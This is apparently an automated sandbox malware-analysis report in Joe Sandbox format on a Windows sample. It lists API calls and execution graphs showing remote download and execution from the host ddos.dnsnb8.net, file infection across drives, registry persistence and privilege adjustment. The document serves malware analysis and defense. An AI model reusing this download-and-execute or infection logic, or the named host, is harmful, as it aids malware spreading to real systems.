                                                                  • Opcode Fuzzy Hash: 7f41f85e15efdb8ac8dfe30aaf0ca92789b6df18d2511d52295f0585edb5d2b8
                                                                  • Instruction Fuzzy Hash: 4FF02BB3A00208AFDB115B58ECCDB19B7AEEBE1756F014027F14487251DB34AA818A65
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(00333518,?,?,00000000,?,001D1699,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D11D3
                                                                  • TlsGetValue.KERNEL32(003334FC,?,?,00000000,?,001D1699,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D11E7
                                                                  • LeaveCriticalSection.KERNEL32(00333518,?,?,00000000,?,001D1699,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D11FD
                                                                  • LeaveCriticalSection.KERNEL32(00333518,?,?,00000000,?,001D1699,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D1208
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$EnterValue
                                                                  • String ID:
                                                                  • API String ID: 3969253408-0
                                                                  • Opcode ID: bd4becc1e56c0c91973d2dbd7d68326b768b98257cb609f294f80bd7209b4449
                                                                  • Instruction ID: f2f58899a075887ce4f0469ce6ecb408721ad497b61f305d566cabfd10ea4b9c
                                                                  • Opcode Fuzzy Hash: bd4becc1e56c0c91973d2dbd7d68326b768b98257cb609f294f80bd7209b4449
                                                                  • Instruction Fuzzy Hash: 5BF05436240214BFC7208F54EC8CC1677EAEA8576532A4956F496D7221DB32F805CA50

                                                                  Execution Graph

                                                                  Execution Coverage:28.8%
                                                                  Dynamic/Decrypted Code Coverage:10.4%
                                                                  Signature Coverage:8.4%
                                                                  Total number of Nodes:297
                                                                  Total number of Limit Nodes:11
                                                                  execution_graph 1335 346014 1336 346035 GetModuleHandleA 1335->1336 1339 34605f 1335->1339 1337 34604d GetProcAddress 1336->1337 1338 346058 1337->1338 1338->1337 1338->1338 1338->1339 1018 346076 1019 34607b 1018->1019 1023 3460c7 1018->1023 1021 3460b0 VirtualAlloc 1019->1021 1019->1023 1030 3461b2 1019->1030 1020 34615f VirtualFree 1020->1023 1021->1023 1022 346198 VirtualFree 1022->1030 1023->1020 1023->1022 1024 3460d5 VirtualAlloc 1023->1024 1024->1023 1025 346389 VirtualProtect 1028 3463b7 1025->1028 1026 3463fc VirtualProtect 1027 346400 1026->1027 1028->1026 1029 3463e7 VirtualProtect 1028->1029 1029->1026 1029->1028 1030->1025 1031 3462fb 1030->1031 1032 3414e1 1033 341541 1032->1033 1034 3414fd GetModuleHandleA 1032->1034 1036 341573 1033->1036 1038 341549 1033->1038 1035 34151a VirtualQuery 1034->1035 1037 341512 1034->1037 1035->1037 1043 341638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1036->1043 1037->1033 1039 341566 1038->1039 1060 341af9 1038->1060 1041 341579 ExitProcess 1044 34167f 1043->1044 1045 34167a 1043->1045 1066 341718 GetSystemTimeAsFileTime 1044->1066 1078 34139f GetVersionExA 1045->1078 1048 341686 1049 3416ca 1048->1049 1052 3416a0 CreateThread 1048->1052 1050 3416d7 1049->1050 1051 3416d0 1049->1051 1054 3416dd lstrcpy 1050->1054 1055 34170f 1050->1055 1099 341581 1051->1099 1071 342c48 memset 1052->1071 1315 341099 1052->1315 1054->1041 1055->1041 1059 341718 3 API calls 1059->1049 1061 341b11 1060->1061 1062 341b09 1060->1062 1064 341b16 CreateThread 1061->1064 1065 341b0f 1061->1065 1063 341638 188 API calls 1062->1063 1063->1065 1064->1065 1334 341638 189 API calls 1064->1334 1065->1039 1067 341754 1066->1067 1068 341735 SHSetValueA 1066->1068 1069 34175a SHGetValueA 1067->1069 1070 341786 __aulldiv 1067->1070 1068->1070 1069->1070 1070->1048 1105 341973 PathFileExistsA 1071->1105 1074 342cb2 1076 3416ba WaitForSingleObject 1074->1076 1077 342cbb VirtualFree 1074->1077 1075 342c8f CreateThread WaitForMultipleObjects 1075->1074 1127 342b8c memset GetLogicalDriveStringsA 1075->1127 1076->1059 1077->1076 1079 3413cf LookupPrivilegeValueA 1078->1079 1080 3414da 1078->1080 1081 3413e7 1079->1081 1082 3413ef 1079->1082 1080->1044 1295 34119f GetCurrentProcess OpenProcessToken 1081->1295 1082->1080 1300 34120e GetModuleHandleA GetProcAddress 1082->1300 1088 341448 GetCurrentProcessId 1088->1080 1089 341457 1088->1089 1089->1080 1090 341319 3 API calls 1089->1090 1091 34147f 1090->1091 1092 341319 3 API calls 1091->1092 1093 34148e 1092->1093 1093->1080 1094 341319 3 API calls 1093->1094 1095 3414b4 1094->1095 1096 341319 3 API calls 1095->1096 1097 3414c3 1096->1097 1098 341319 3 API calls 1097->1098 1098->1080 1314 34185b GetSystemTimeAsFileTime srand rand srand rand 1099->1314 1101 341592 wsprintfA wsprintfA lstrlen CreateFileA 1102 341633 1101->1102 1103 3415fb WriteFile CloseHandle 1101->1103 1102->1055 1103->1102 1104 34161d ShellExecuteA 1103->1104 1104->1102 1106 3419a0 1105->1106 1123 341ac7 1105->1123 1107 3419af CreateFileA 1106->1107 1108 3419c4 Sleep 1107->1108 1109 341a28 GetFileSize 1107->1109 1108->1107 1110 3419d5 1108->1110 1111 341a80 1109->1111 1112 341a38 1109->1112 1126 34185b GetSystemTimeAsFileTime srand rand srand rand 1110->1126 1113 341a96 1111->1113 1114 341a8d CloseHandle 1111->1114 1112->1111 1116 341a3d VirtualAlloc 1112->1116 1118 341a9c DeleteFileA 1113->1118 1119 341aad 1113->1119 1114->1113 1116->1111 1117 341a53 1116->1117 1117->1111 1121 341a59 ReadFile 1117->1121 1118->1119 1119->1123 1125 341ab8 VirtualFree 1119->1125 1120 3419da wsprintfA CopyFileA 1120->1109 1124 341a0d CreateFileA 1120->1124 1121->1111 1121->1117 1123->1074 1123->1075 1124->1109 1124->1118 1125->1123 1126->1120 1128 342bc8 1127->1128 1129 342c09 WaitForMultipleObjects 1127->1129 1132 342bfa lstrlen 1128->1132 1133 342bd2 GetDriveTypeA 1128->1133 1134 342be3 CreateThread 1128->1134 1130 342c3c 1129->1130 1131 342c2a CreateThread 1129->1131 1131->1130 1138 342845 1131->1138 1132->1128 1132->1129 1133->1128 1133->1132 1134->1132 1135 342b7d 1134->1135 1148 3429e2 memset wsprintfA 1135->1148 1285 34274a memset memset SHGetSpecialFolderPathA wsprintfA 1138->1285 1140 342878 DeleteFileA 1141 34288c VirtualFree 1140->1141 1142 34289a 1140->1142 1141->1142 1144 3428a4 CloseHandle 1142->1144 1145 3428ab 1142->1145 1143 342692 8 API calls 1146 342853 1143->1146 1144->1145 1146->1140 1146->1143 1147 34239d 186 API calls 1146->1147 1147->1146 1149 342abc memset memset FindFirstFileA 1148->1149 1150 342a3a memset lstrlen lstrcpyn strrchr 1148->1150 1162 3428b8 memset wsprintfA 1149->1162 1150->1149 1151 342a88 1150->1151 1151->1149 1153 342a9a lstrcmpiA 1151->1153 1156 342b74 1153->1156 1157 342aad lstrlen 1153->1157 1155 342b61 FindNextFileA 1158 342b23 1155->1158 1159 342b6d FindClose 1155->1159 1157->1149 1157->1153 1160 342b35 lstrcmpiA 1158->1160 1161 3428b8 174 API calls 1158->1161 1159->1156 1160->1158 1160->1159 1161->1155 1163 342905 1162->1163 1168 342951 memset 1162->1168 1164 342956 strrchr 1163->1164 1165 34291b memset wsprintfA 1163->1165 1163->1168 1167 342967 lstrcmpiA 1164->1167 1164->1168 1166 3429e2 180 API calls 1165->1166 1166->1168 1169 342988 lstrcmpiA 1167->1169 1170 34297a 1167->1170 1168->1155 1169->1168 1171 342994 1169->1171 1180 341e6e 1170->1180 1173 3429ad strstr 1171->1173 1174 3429a5 lstrcpy 1171->1174 1175 3429d3 1173->1175 1176 3429cb 1173->1176 1174->1173 1245 342692 1175->1245 1223 34239d strstr 1176->1223 1181 341e7d 1180->1181 1254 341df6 strrchr 1181->1254 1184 341eb0 SetFileAttributesA CreateFileA 1185 342332 1184->1185 1186 341edf 1184->1186 1188 342346 1185->1188 1189 34233d UnmapViewOfFile 1185->1189 1259 341915 1186->1259 1191 342350 1188->1191 1192 34234b CloseHandle 1188->1192 1189->1188 1193 342356 CloseHandle 1191->1193 1194 342391 1191->1194 1192->1191 1193->1194 1194->1168 1195 341f2e 1195->1185 1265 341c81 1195->1265 1199 341f92 1200 341c81 2 API calls 1199->1200 1201 341f9f 1200->1201 1201->1185 1202 342024 1201->1202 1203 341af9 169 API calls 1201->1203 1202->1185 1204 341af9 169 API calls 1202->1204 1207 341fc0 1203->1207 1205 34207a 1204->1205 1206 341af9 169 API calls 1205->1206 1211 342090 1206->1211 1207->1185 1207->1202 1208 341af9 169 API calls 1207->1208 1209 341ffe 1208->1209 1210 342013 FlushViewOfFile 1209->1210 1210->1202 1212 3420bb memset memset 1211->1212 1213 3420f5 1212->1213 1214 341c81 2 API calls 1213->1214 1216 3421de 1214->1216 1215 342226 memcpy UnmapViewOfFile CloseHandle 1270 341b8a 1215->1270 1216->1215 1218 34226e 1278 34185b GetSystemTimeAsFileTime srand rand srand rand 1218->1278 1220 3422ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1221 341915 3 API calls 1220->1221 1222 34231f CloseHandle 1221->1222 1222->1185 1224 342451 CreateFileA GetFileSize 1223->1224 1231 3423d8 1223->1231 1225 342675 CloseHandle 1224->1225 1226 342480 1224->1226 1227 34267c RemoveDirectoryA 1225->1227 1226->1225 1228 342499 1226->1228 1229 342687 1227->1229 1230 341915 3 API calls 1228->1230 1229->1168 1232 3424a4 9 API calls 1230->1232 1231->1224 1231->1229 1280 34189d memset CreateProcessA 1232->1280 1235 34255c Sleep memset wsprintfA 1236 3429e2 163 API calls 1235->1236 1237 342597 memset wsprintfA Sleep 1236->1237 1238 34189d 6 API calls 1237->1238 1239 3425e4 Sleep CreateFileA 1238->1239 1240 341915 3 API calls 1239->1240 1241 342610 CloseHandle 1240->1241 1241->1227 1242 34261e 1241->1242 1242->1227 1243 342641 SetFilePointer WriteFile 1242->1243 1243->1227 1244 342667 SetEndOfFile 1243->1244 1244->1227 1246 3426b2 WaitForSingleObject 1245->1246 1247 3426a2 CreateEventA 1245->1247 1248 3426c1 lstrlen ??2@YAPAXI 1246->1248 1249 342708 1246->1249 1247->1246 1250 342736 SetEvent 1248->1250 1251 3426da lstrcpy 1248->1251 1249->1250 1252 342718 lstrcpy ??3@YAXPAX 1249->1252 1250->1168 1253 3426f1 1251->1253 1252->1253 1253->1250 1255 341e13 lstrcpy strrchr 1254->1255 1258 341e62 1254->1258 1256 341e40 lstrcmpiA 1255->1256 1255->1258 1257 341e52 lstrlen 1256->1257 1256->1258 1257->1256 1257->1258 1258->1184 1258->1185 1260 341928 1259->1260 1263 341924 SetFilePointer CreateFileMappingA MapViewOfFile 1259->1263 1261 34192e memset GetFileTime 1260->1261 1262 34194f 1260->1262 1261->1263 1262->1263 1264 341954 SetFileTime 1262->1264 1263->1185 1263->1195 1264->1263 1266 341c9c 1265->1266 1268 341c94 1265->1268 1267 341cae memset memset 1266->1267 1266->1268 1267->1268 1268->1185 1269 34185b GetSystemTimeAsFileTime srand rand srand rand 1268->1269 1269->1199 1272 341b93 1270->1272 1279 34185b GetSystemTimeAsFileTime srand rand srand rand 1272->1279 1273 341bca srand 1274 341bd8 rand 1273->1274 1275 341c08 1274->1275 1275->1274 1276 341c29 memset memcpy lstrcat 1275->1276 1276->1218 1278->1220 1279->1273 1281 3418e0 CloseHandle WaitForSingleObject 1280->1281 1282 34190c 1280->1282 1283 341907 CloseHandle 1281->1283 1284 3418fb GetExitCodeProcess 1281->1284 1282->1227 1282->1235 1283->1282 1284->1283 1294 34185b GetSystemTimeAsFileTime srand rand srand rand 1285->1294 1287 3427b5 wsprintfA CopyFileA 1288 342840 1287->1288 1289 3427de wsprintfA 1287->1289 1288->1146 1290 341973 17 API calls 1289->1290 1291 34280f 1290->1291 1292 342820 CreateFileA 1291->1292 1293 342813 DeleteFileA 1291->1293 1292->1288 1293->1292 1294->1287 1296 3411c6 AdjustTokenPrivileges 1295->1296 1297 341200 CloseHandle 1295->1297 1298 3411f6 1296->1298 1299 3411f7 CloseHandle 1296->1299 1297->1082 1298->1299 1299->1297 1301 341310 1300->1301 1302 34123f GetCurrentProcessId OpenProcess 1300->1302 1301->1080 1309 341319 1301->1309 1302->1301 1306 341262 1302->1306 1303 3412b0 VirtualAlloc 1303->1306 1307 3412b8 1303->1307 1304 3412f1 CloseHandle 1304->1301 1305 341302 VirtualFree 1304->1305 1305->1301 1306->1303 1306->1304 1306->1307 1308 341296 VirtualFree 1306->1308 1307->1304 1308->1303 1310 34134a 1309->1310 1311 34132a GetModuleHandleA GetProcAddress 1309->1311 1312 341351 memset 1310->1312 1313 341363 1310->1313 1311->1310 1311->1313 1312->1313 1313->1080 1313->1088 1314->1101 1316 341196 1315->1316 1317 3410ba 1315->1317 1317->1316 1333 34185b GetSystemTimeAsFileTime srand rand srand rand 1317->1333 1319 341118 wsprintfA wsprintfA URLDownloadToFileA 1320 3410dc 1319->1320 1321 341168 lstrlen Sleep 1319->1321 1324 341000 CreateFileA 1320->1324 1321->1317 1325 341025 GetFileSize CreateFileMappingA MapViewOfFile 1324->1325 1326 341092 WinExec lstrlen 1324->1326 1327 341057 1325->1327 1328 34107b 1325->1328 1326->1316 1326->1317 1331 341074 UnmapViewOfFile 1327->1331 1332 341061 1327->1332 1329 341087 CloseHandle 1328->1329 1330 34108d CloseHandle 1328->1330 1329->1330 1330->1326 1331->1328 1332->1331 1333->1319 1340 342361 1341 342374 1340->1341 1342 34236b UnmapViewOfFile 1340->1342 1343 342382 1341->1343 1344 342379 CloseHandle 1341->1344 1342->1341 1345 342388 CloseHandle 1343->1345 1346 342391 1343->1346 1344->1343 1345->1346 1347 346158 1348 34615f VirtualFree 1347->1348 1355 3460c7 1348->1355 1349 346198 VirtualFree 1357 3461b2 1349->1357 1350 3460d5 VirtualAlloc 1350->1355 1351 346389 VirtualProtect 1354 3463b7 1351->1354 1352 3463fc VirtualProtect 1353 346400 1352->1353 1354->1352 1356 3463e7 VirtualProtect 1354->1356 1355->1348 1355->1349 1355->1350 1356->1352 1356->1354 1357->1351 1358 3462fb 1357->1358

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph 0 Function_00346734 19 Function_00346A84 0->19 21 Function_00346D00 0->21 25 Function_00346B02 0->25 1 Function_00346834 2 Function_003469B0 3 Function_003428B8 9 Function_00342692 3->9 11 Function_0034239D 3->11 43 Function_003429E2 3->43 45 Function_00341E6E 3->45 4 Function_00341638 14 Function_0034139F 4->14 15 Function_00341718 4->15 16 Function_00341099 4->16 24 Function_00341581 4->24 47 Function_003417D0 4->47 53 Function_00342C48 4->53 5 Function_003467A4 6 Function_003465A6 7 Function_00346014 8 Function_00341915 10 Function_00346012 11->8 12 Function_0034189D 11->12 11->43 13 Function_0034119F 14->13 17 Function_00341319 14->17 27 Function_0034120E 14->27 34 Function_00342CF0 15->34 20 Function_00341000 16->20 51 Function_0034185B 16->51 18 Function_00342D9B 28 Function_0034680F 19->28 35 Function_00346CF2 19->35 20->47 21->2 21->35 44 Function_00346B63 21->44 22 Function_00346001 31 Function_0034600A 22->31 23 Function_00341C81 24->51 25->44 26 Function_00342B8C 37 Function_00342B7D 26->37 52 Function_00342845 26->52 29 Function_00341D8A 30 Function_00341B8A 30->51 32 Function_00346076 54 Function_003466C8 32->54 33 Function_00341DF6 38 Function_00346CF8 35->38 36 Function_00341973 36->51 37->43 39 Function_00341AF9 39->4 40 Function_00342D60 41 Function_003414E1 41->4 41->39 42 Function_00342361 42->18 43->3 44->1 44->2 44->5 45->8 45->18 45->23 45->29 45->30 45->33 45->39 45->40 46 Function_00341C68 45->46 45->51 48 Function_003465DC 49 Function_0034235D 50 Function_00346158 50->54 52->9 52->11 55 Function_0034274A 52->55 53->26 53->36 54->19 54->21 54->25 55->36 55->51

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 101 3429e2-342a34 memset wsprintfA 102 342abc-342b21 memset * 2 FindFirstFileA call 3428b8 memset 101->102 103 342a3a-342a86 memset lstrlen lstrcpyn strrchr 101->103 108 342b61-342b6b FindNextFileA 102->108 103->102 104 342a88-342a98 103->104 104->102 106 342a9a-342aa7 lstrcmpiA 104->106 109 342b74-342b7a 106->109 110 342aad-342aba lstrlen 106->110 111 342b23-342b2a 108->111 112 342b6d-342b6e FindClose 108->112 110->102 110->106 113 342b4c-342b5c call 3428b8 111->113 114 342b2c-342b33 111->114 112->109 113->108 114->113 115 342b35-342b4a lstrcmpiA 114->115 115->112 115->113
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                                  • Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_340000_JdEV.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                                  • String ID: %s*$C:\$Documents and Settings
                                                                  • API String ID: 2826467728-110786608
                                                                  • Opcode ID: 0b69d69d4bfbb612d39ebf5f6f8bad037afc98ffa73f0f3dd070941fbedee314
                                                                  • Instruction ID: 332690293b092674da60294da31d36174d99916a04e17f538d55e9d3351f7277
                                                                  • Opcode Fuzzy Hash: 0b69d69d4bfbb612d39ebf5f6f8bad037afc98ffa73f0f3dd070941fbedee314
                                                                  • Instruction Fuzzy Hash: 7F4188B2404349AFD722DF90EC89DEB77ECEF85315F440929F945DB111EA34EA4887A2

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 172 341099-3410b4 173 341199-34119c 172->173 174 3410ba-3410c7 172->174 175 3410c8-3410d4 174->175 176 341184-341190 175->176 177 3410da 175->177 176->175 179 341196-341198 176->179 178 341113-341162 call 34185b wsprintfA * 2 URLDownloadToFileA 177->178 182 3410dc-34110d call 341000 WinExec lstrlen 178->182 183 341168-341182 lstrlen Sleep 178->183 179->173 182->178 182->179 183->176 183->178
                                                                  APIs
                                                                    • Part of subcall function 0034185B: GetSystemTimeAsFileTime.KERNEL32(00341F92,00000000,?,00000000,?,?,?,00341F92,?,00000000,00000002), ref: 00341867
                                                                    • Part of subcall function 0034185B: srand.MSVCRT ref: 00341878
                                                                    • Part of subcall function 0034185B: rand.MSVCRT ref: 00341880
                                                                    • Part of subcall function 0034185B: srand.MSVCRT ref: 00341890
                                                                    • Part of subcall function 0034185B: rand.MSVCRT ref: 00341894
                                                                  • WinExec.KERNEL32(?,00000005), ref: 003410F1
                                                                  • lstrlen.KERNEL32(00344748), ref: 003410FA
                                                                  • wsprintfA.USER32 ref: 0034112A
                                                                  • wsprintfA.USER32 ref: 00341143
                                                                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0034115B
                                                                  • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00341169
                                                                  • Sleep.KERNEL32 ref: 00341179
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                                  • Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_340000_JdEV.jbxd
                                                                  Similarity
                                                                  • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                                                  • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG4$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                  • API String ID: 1280626985-2137254892
                                                                  • Opcode ID: 0016f70ff50e46ee8622ae8629e9054c9793e66daff99e83be957dd83d5eb5e7
                                                                  • Instruction ID: feca003dec1ca9a8f45fcd0d8ec25f6699dad3859804849332ff0d338937fb03
                                                                  • Opcode Fuzzy Hash: 0016f70ff50e46ee8622ae8629e9054c9793e66daff99e83be957dd83d5eb5e7
                                                                  • Instruction Fuzzy Hash: 27218E79900608BADB22DBA0DC48BAEBBFCAB16315F1141A5E505AB050DB74BB84DF60

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 216 341718-341733 GetSystemTimeAsFileTime 217 341754-341758 216->217 218 341735-341752 SHSetValueA 216->218 219 3417c6-3417cd 217->219 220 34175a-341784 SHGetValueA 217->220 218->219 220->219 221 341786-3417b3 call 342cf0 * 2 220->221 221->219 226 3417b5 221->226 227 3417b7-3417bd 226->227 228 3417bf 226->228 227->219 227->228 228->219
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\JdEV.exe), ref: 00341729
                                                                  • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0034174C
                                                                  • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0034177C
                                                                  • __aulldiv.LIBCMT ref: 00341796
                                                                  • __aulldiv.LIBCMT ref: 003417A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                                  • Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_340000_JdEV.jbxd
                                                                  Similarity
                                                                  • API ID: TimeValue__aulldiv$FileSystem
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\JdEV.exe$SOFTWARE\GTplus$Time
                                                                  • API String ID: 541852442-762845633
                                                                  • Opcode ID: f64df289e593907332e4e6402e48afb378015a43d1e2c5d2326b1e53b53dd957
                                                                  • Instruction ID: abf924ad6d72d1d4aa2f1f4ff5b8fe014788c5eb2c90b43f8239b3cffed6e0a8
                                                                  • Opcode Fuzzy Hash: f64df289e593907332e4e6402e48afb378015a43d1e2c5d2326b1e53b53dd957
                                                                  • Instruction Fuzzy Hash: 9D113375A00609BBDB129A94CCC9FEF7FFCEB45B14F108515FA01BF181D671AA848B60

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 229 346076-346079 230 3460e0-3460eb 229->230 231 34607b-346080 229->231 234 3460ee-3460f4 230->234 232 3460f7-3460f8 231->232 233 346082-346085 231->233 237 3460fe-346106 232->237 238 3460fa-3460fc call 3466c8 232->238 235 3460f6 233->235 236 346087 233->236 234->235 235->232 236->234 241 346089-346095 236->241 239 346155-346189 VirtualFree 237->239 240 346108-34611d 237->240 238->237 251 34618c-346192 239->251 243 34611f-346121 240->243 244 346097-34609f 241->244 245 3460a1-3460aa 241->245 247 346151-346154 243->247 248 346123 243->248 244->245 249 3460b0-3460c1 VirtualAlloc 245->249 250 3461ba-3461c8 245->250 247->239 248->247 254 346125-346128 248->254 255 3460c7-3460cf 249->255 252 346243-346251 250->252 253 3461ca-3461d7 250->253 251->255 256 346198-3461b0 VirtualFree 251->256 261 346264-34626f 252->261 262 346253 252->262 257 3461dd-3461e0 253->257 258 346134-34613b 254->258 259 34612a-34612e 254->259 255->251 260 3460d5-3460df VirtualAlloc 255->260 256->250 263 3461b2-3461b4 256->263 257->252 265 3461e2-3461f2 257->265 273 346130-346132 258->273 274 34613d-34614f 258->274 259->258 259->273 260->230 264 346271-346276 261->264 268 346255-346258 262->268 263->250 270 34627c-346289 264->270 271 346389-3463b1 VirtualProtect 264->271 272 3461f5-3461fe 265->272 268->261 269 34625a-346262 268->269 269->268 285 346292-346298 270->285 286 34628b 270->286 277 3463b7-3463ba 271->277 275 346200-346203 272->275 276 34620c-346219 272->276 273->243 274->243 279 346205-346208 275->279 280 34621b-346228 275->280 281 346238-34623f 276->281 282 3463fc-3463ff VirtualProtect 277->282 283 3463bc-3463c2 277->283 287 34622a-346236 279->287 288 34620a 279->288 280->281 281->272 290 346241 281->290 284 346400-346416 282->284 283->283 289 3463c4 283->289 293 346420-346425 284->293 294 346418-34641d 284->294 291 3462a2-3462ac 285->291 286->285 287->281 288->281 289->282 292 3463c6-3463cf 289->292 290->257 295 3462b1-3462c8 291->295 296 3462ae 291->296 297 3463d4-3463d8 292->297 298 3463d1 292->298 299 346373-346384 295->299 300 3462ce-3462d4 295->300 296->295 301 3463dd-3463e1 297->301 302 3463da 297->302 298->297 299->264 305 3462d6-3462d9 300->305 306 3462da-3462f1 300->306 303 3463e7-3463fa VirtualProtect 301->303 304 3463e3 301->304 302->301 303->277 303->282 304->303 305->306 308 346365-34636e 306->308 309 3462f3-3462f9 306->309 308->291 310 346314-346326 309->310 311 3462fb-34630f 309->311 313 34634c-346360 310->313 314 346328-34634a 310->314 312 346426-3464a9 311->312 323 346519-34651c 312->323 324 3464ab-3464c0 312->324 313->312 314->308 325 346583-346587 323->325 326 34651d-34651e 323->326 330 346535-346537 324->330 331 3464c2 324->331 328 346588-34658b 325->328 329 346522-346533 326->329 332 3465a1-3465a3 328->332 333 34658d-34658f 328->333 329->330 334 346539 330->334 335 34659a 330->335 336 3464c5-3464cd 331->336 337 3464f8 331->337 338 346591-346593 333->338 339 3465b4 334->339 340 34653b-346541 334->340 341 34659b-34659d 335->341 342 346542-346545 336->342 343 3464cf-3464d4 336->343 344 34656c-34656f 337->344 345 3464fa-3464fe 337->345 338->341 346 346595 338->346 351 3465be 339->351 340->342 341->338 347 34659f 341->347 348 34654d-346550 342->348 349 3464d6-3464d9 343->349 350 346517-346518 343->350 352 346572 344->352 345->352 353 346500 345->353 346->335 347->328 348->351 356 346552-346556 348->356 349->348 357 3464db-3464f5 349->357 350->323 351->351 354 346573-346576 352->354 353->329 355 346502 353->355 358 346578-34657a 354->358 355->354 359 346504-346513 355->359 356->358 360 346558-346569 356->360 357->337 361 34657c 358->361 362 3465dd-3465f6 358->362 359->330 363 346515 359->363 360->344 364 3465f7-346608 361->364 365 34657e-34657f 361->365 362->364 363->350 365->325
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 003460BE
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003460DF
                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00346189
                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003461A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                                  • Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_340000_JdEV.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree
                                                                  • String ID:
